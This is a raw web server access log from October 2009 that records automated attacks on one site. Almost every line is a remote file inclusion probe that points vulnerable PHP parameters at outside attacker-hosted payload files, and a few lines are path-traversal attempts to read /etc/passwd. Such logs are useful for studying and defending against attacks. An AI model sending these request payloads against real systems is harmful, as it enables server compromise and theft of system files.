211.223.201.177 - - [25/Oct/2009:18:55:30 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:55:30 -0700] "GET /include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:55:34 -0700] "GET /logs/access_090720.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:55:34 -0700] "GET /logs/access_090511.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:55:54 -0700] "GET /logs/access_090629.log/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:55:54 -0700] "GET /logs/access_090316.log/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:55:54 -0700] "GET /index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:55:54 -0700] "GET /logs/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:55:55 -0700] "GET /logs/access_090914.log/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:13 -0700] "GET /logs/access_090427.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:14 -0700] "GET /include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:15 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:15 -0700] "GET /logs/access_090518.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:56:15 -0700] "GET /index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:56:15 -0700] "GET /logs/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:56:15 -0700] "GET /logs/access_090316.log/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:17 -0700] "GET /logs/access_090518.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:18 -0700] "GET /logs/access_090720.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:19 -0700] "GET /logs/access_090511.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:18:56:20 -0700] "GET /logs/access_090629.log/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:25 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:25 -0700] "GET /include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:25 -0700] "GET /logs/access_090518.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:25 -0700] "GET /logs/access_090511.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:25 -0700] "GET /logs/access_090720.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:37 -0700] "GET /logs/access_090427.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:38 -0700] "GET /logs/access_090518.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:40 -0700] "GET /logs/access_090511.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:44 -0700] "GET /logs/access_090427.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:46 -0700] "GET /logs/access_090518.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:56:46 -0700] "GET /logs/access_090511.log/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [25/Oct/2009:18:57:39 -0700] "GET /logs//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [25/Oct/2009:18:57:39 -0700] "GET /logs/access_090316.log%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [25/Oct/2009:18:57:39 -0700] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.147.194 - - [25/Oct/2009:18:57:48 -0700] "GET /logs/access_090629.log/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:58:25 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.210.84.226 - - [25/Oct/2009:18:58:25 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.210.84.226 - - [25/Oct/2009:18:58:25 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.210.84.226 - - [25/Oct/2009:18:58:27 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:58:27 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:58:28 -0700] "GET /logs/access_090316.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [25/Oct/2009:18:58:39 -0700] "GET /logs/access_090323.log%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:59:03 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:59:03 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:59:03 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:59:03 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:18:59:34 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:18:59:34 -0700] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:18:59:34 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:59:56 -0700] "GET /logs/access_090427.log//index.php?basePath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:19:00:31 -0700] "GET /logs/access_090518.log//index.php?basePath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:19:00:52 -0700] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.238.2.226 - - [25/Oct/2009:19:02:55 -0700] "GET /logs/access_090316.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:19:02:55 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:19:02:55 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:19:02:55 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.238.2.226 - - [25/Oct/2009:19:02:55 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.238.2.226 - - [25/Oct/2009:19:02:55 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
198.106.204.159 - - [25/Oct/2009:19:03:49 -0700] "GET /logs/access_090316.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:19:03:49 -0700] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:19:03:49 -0700] "GET /logs//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:19:03:53 -0700] "GET /logs/access_090316.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:19:03:53 -0700] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:19:03:53 -0700] "GET /logs//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:20 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:20 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:21 -0700] "GET /logs/access_090406.log//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:21 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:26 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:26 -0700] "GET /logs/access_090406.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:26 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:29 -0700] "GET /logs/access_090406.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:29 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:29 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:31 -0700] "GET /logs/access_090406.log//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:19:06:31 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:04 -0700] "GET /logs/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:04 -0700] "GET /errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:08 -0700] "GET /logs/access.log%20%20/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:11 -0700] "GET /logs/access.log%20%20/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:11 -0700] "GET /errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:11 -0700] "GET /logs/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:18 -0700] "GET /logs/access.log%20%20/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:18 -0700] "GET /errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.223.201.177 - - [25/Oct/2009:19:07:18 -0700] "GET /logs/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
198.106.204.159 - - [25/Oct/2009:19:08:54 -0700] "GET /logs/access_090323.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:19:08:55 -0700] "GET /logs/access_090323.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
114.4.12.3 - - [25/Oct/2009:19:09:19 -0700] "GET /logs/access_090316.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:19:09:23 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:19:09:23 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:19:09:23 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:19:09:23 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
114.4.12.3 - - [25/Oct/2009:19:09:26 -0700] "GET /logs/access_090323.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:11:59 -0700] "GET /zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:11:59 -0700] "GET /logs//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:11:59 -0700] "GET /logs/access_090824.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:12:06 -0700] "GET /logs/access_090720.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:19:12:23 -0700] "GET /zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:19:12:23 -0700] "GET /logs/access_090824.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:19:12:23 -0700] "GET /logs//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.246.79.115 - - [25/Oct/2009:19:12:35 -0700] "GET /logs/access_090720.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:14:44 -0700] "GET /logs/access_090720.log//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:14:44 -0700] "GET /zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:14:44 -0700] "GET /logs//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.173 - - [25/Oct/2009:19:14:44 -0700] "GET /logs/access_090824.log//zboard/skin/ggambo7002_board/write.php?dir=http://jatimcom.awardspace.info/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:31 -0700] "GET /zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:31 -0700] "GET /logs//zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:31 -0700] "GET /logs/access_090824.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:40 -0700] "GET /logs//zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:41 -0700] "GET /logs/access_090824.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:41 -0700] "GET /zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:44 -0700] "GET /logs/access_090720.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:16:57 -0700] "GET /logs/access_090720.log%20%20//zboard/skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:17:15 -0700] "GET /logs/access_090720.log%20%20//write.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:17:15 -0700] "GET /logs/access_090824.log%20%20//write.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:17:15 -0700] "GET /write.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:17:15 -0700] "GET /logs//write.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
